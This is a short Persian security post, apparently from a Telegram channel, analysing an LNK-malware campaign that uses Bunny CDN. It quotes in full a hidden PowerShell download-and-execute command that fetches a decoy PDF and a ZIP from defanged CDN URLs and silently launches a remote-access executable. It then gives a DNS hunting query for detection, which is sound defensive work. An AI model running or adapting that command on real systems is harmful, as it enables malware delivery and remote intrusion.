📃 طبق این گزارش مهاجم از یه فایل LNK مخرب برای اجرای یه دستور مخفی PowerShell استفاده کرده که یه سند PDF جعلی (lure) و یه فایل ZIP دیگه رو از آدرس Bunny CDN دانلود میکنه:
با وجود اینکه این دستور خیلی رایجه و بهراحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:
@TryHackBox
#LNKMalware #PowerShell #Malicious
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Description.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"با وجود اینکه این دستور خیلی رایجه و بهراحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:
event_type: "dnsreqwin"
AND
dns_rname: "b-cdn.net"
@TryHackBox
#LNKMalware #PowerShell #Malicious
❤5